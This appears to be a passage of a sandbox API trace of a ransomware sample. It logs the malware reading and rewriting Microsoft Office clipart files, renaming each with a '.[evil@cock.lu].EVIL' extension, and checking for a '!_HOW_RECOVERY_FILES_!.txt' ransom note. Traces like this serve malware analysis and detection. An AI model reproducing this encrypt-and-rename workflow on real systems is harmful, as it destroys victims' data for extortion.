0x1a8 [0170.733] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x900, lpOverlapped=0x0) returned 1 [0170.735] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.735] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.735] _errno () returned 0x84b1160840 [0170.735] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.735] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x920, lpOverlapped=0x0) returned 1 [0170.736] CloseHandle (hObject=0x1a8) returned 1 [0170.736] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02233_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.736] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.736] __uncaught_exception () returned 0x84b1160800 [0170.736] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.736] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02233_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02233_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02233_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02233_.wmf.[evil@cock.lu].evil")) returned 1 [0170.737] ??_V@YAXPEAX@Z () returned 0x1 [0170.740] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02233_.WMF", dwFileAttributes=0x200) returned 0 [0170.740] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.740] wcsstr (_Str="SO02252_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.740] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02252_.WMF") returned 69 [0170.740] wcscmp (_String1="SO02252_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.740] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02252_.WMF") returned 0x0 [0170.740] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02252_.WMF") returned 0x45 [0170.740] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.742] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe88, lpOverlapped=0x0) returned 1 [0170.780] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.780] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.780] _errno () returned 0x84b1160840 [0170.780] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.780] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xea0, lpOverlapped=0x0) returned 1 [0170.780] CloseHandle (hObject=0x1a8) returned 1 [0170.780] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02252_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.781] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.781] __uncaught_exception () returned 0x84b1160800 [0170.781] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.781] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02252_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02252_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02252_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02252_.wmf.[evil@cock.lu].evil")) returned 1 [0170.782] ??_V@YAXPEAX@Z () returned 0x1 [0170.785] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02252_.WMF", dwFileAttributes=0x200) returned 0 [0170.785] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.785] wcsstr (_Str="SO02253_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.785] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02253_.WMF") returned 69 [0170.785] wcscmp (_String1="SO02253_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.785] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02253_.WMF") returned 0x0 [0170.785] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02253_.WMF") returned 0x45 [0170.785] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02253_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02253_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.787] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8e0, lpOverlapped=0x0) returned 1 [0170.807] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.807] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.807] _errno () returned 0x84b1160840 [0170.807] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.807] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x900, lpOverlapped=0x0) returned 1 [0170.807] CloseHandle (hObject=0x1a8) returned 1 [0170.807] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02253_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.807] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.807] __uncaught_exception () returned 0x84b1160800 [0170.807] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.808] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02253_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02253_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02253_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02253_.wmf.[evil@cock.lu].evil")) returned 1 [0170.808] ??_V@YAXPEAX@Z () returned 0x1 [0170.812] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02253_.WMF", dwFileAttributes=0x200) returned 0 [0170.812] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.812] wcsstr (_Str="SO02261_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.812] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02261_.WMF") returned 69 [0170.812] wcscmp (_String1="SO02261_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.812] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02261_.WMF") returned 0x0 [0170.812] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02261_.WMF") returned 0x45 [0170.812] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.814] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x818, lpOverlapped=0x0) returned 1 [0170.892] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.892] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.892] _errno () returned 0x84b1160840 [0170.892] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.892] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x820, lpOverlapped=0x0) returned 1 [0170.892] CloseHandle (hObject=0x1a8) returned 1 [0170.892] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02261_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.892] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.892] __uncaught_exception () returned 0x84b1160800 [0170.892] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.893] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02261_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02261_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02261_.wmf.[evil@cock.lu].evil")) returned 1 [0170.894] ??_V@YAXPEAX@Z () returned 0x1 [0170.897] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02261_.WMF", dwFileAttributes=0x200) returned 0 [0170.898] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.898] wcsstr (_Str="SO02263_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.898] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02263_.WMF") returned 69 [0170.898] wcscmp (_String1="SO02263_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.898] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02263_.WMF") returned 0x0 [0170.898] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02263_.WMF") returned 0x45 [0170.898] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02263_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02263_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.900] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa94, lpOverlapped=0x0) returned 1 [0170.941] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.941] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.941] _errno () returned 0x84b1160840 [0170.941] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.941] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xaa0, lpOverlapped=0x0) returned 1 [0170.941] CloseHandle (hObject=0x1a8) returned 1 [0170.941] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02263_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.941] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.942] __uncaught_exception () returned 0x84b1160800 [0170.942] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.942] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02263_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02263_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02263_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02263_.wmf.[evil@cock.lu].evil")) returned 1 [0170.943] ??_V@YAXPEAX@Z () returned 0x1 [0170.946] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02263_.WMF", dwFileAttributes=0x200) returned 0 [0170.946] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.946] wcsstr (_Str="SO02265_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.946] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02265_.WMF") returned 69 [0170.946] wcscmp (_String1="SO02265_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.946] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02265_.WMF") returned 0x0 [0170.946] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02265_.WMF") returned 0x45 [0170.946] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.949] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x38c, lpOverlapped=0x0) returned 1 [0170.991] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.991] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.991] _errno () returned 0x84b1160840 [0170.991] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.991] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3a0, lpOverlapped=0x0) returned 1 [0170.991] CloseHandle (hObject=0x1a8) returned 1 [0170.991] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02265_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.992] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.992] __uncaught_exception () returned 0x84b1160800 [0170.992] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0170.992] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02265_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02265_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02265_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02265_.wmf.[evil@cock.lu].evil")) returned 1 [0170.993] ??_V@YAXPEAX@Z () returned 0x1 [0170.996] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02265_.WMF", dwFileAttributes=0x200) returned 0 [0170.996] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0170.996] wcsstr (_Str="SO02268_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0170.996] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02268_.WMF") returned 69 [0170.996] wcscmp (_String1="SO02268_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0170.996] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02268_.WMF") returned 0x0 [0170.996] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02268_.WMF") returned 0x45 [0170.996] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02268_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02268_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0170.998] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x61c, lpOverlapped=0x0) returned 1 [0171.005] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.005] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.006] _errno () returned 0x84b1160840 [0171.006] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.006] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x620, lpOverlapped=0x0) returned 1 [0171.006] CloseHandle (hObject=0x1a8) returned 1 [0171.006] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02268_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.006] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.006] __uncaught_exception () returned 0x84b1160800 [0171.006] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.006] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02268_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02268_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02268_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02268_.wmf.[evil@cock.lu].evil")) returned 1 [0171.007] ??_V@YAXPEAX@Z () returned 0x1 [0171.010] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02268_.WMF", dwFileAttributes=0x200) returned 0 [0171.010] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.010] wcsstr (_Str="SO02269_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.010] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02269_.WMF") returned 69 [0171.010] wcscmp (_String1="SO02269_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.010] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02269_.WMF") returned 0x0 [0171.010] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02269_.WMF") returned 0x45 [0171.010] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.013] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xaf0, lpOverlapped=0x0) returned 1 [0171.032] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.032] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.032] _errno () returned 0x84b1160840 [0171.032] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0171.032] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb00, lpOverlapped=0x0) returned 1 [0171.032] CloseHandle (hObject=0x1a8) returned 1 [0171.032] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02269_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0171.032] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0171.033] __uncaught_exception () returned 0x84b1160800 [0171.033] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0171.033] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02269_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02269_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02269_.wmf.[evil@cock.lu].evil")) returned 1 [0171.034] ??_V@YAXPEAX@Z () returned 0x1 [0171.037] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02269_.WMF", dwFileAttributes=0x200) returned 0 [0171.037] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0171.037] wcsstr (_Str="SO02270_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0171.037] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02270_.WMF") returned 69 [0171.037] wcscmp (_String1="SO02270_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0171.037] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO02270_.WMF") returned 0x0 [0171.037] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02270_.WMF") returned 0x45 [0171.037] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02270_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02270_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0171.039] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa68, lpOverlapped=0x0) returned 1 [0171.045] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.045] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0171.045] _errno () returned 0x84b1160840 [0171.045] SetFilePointer (in: 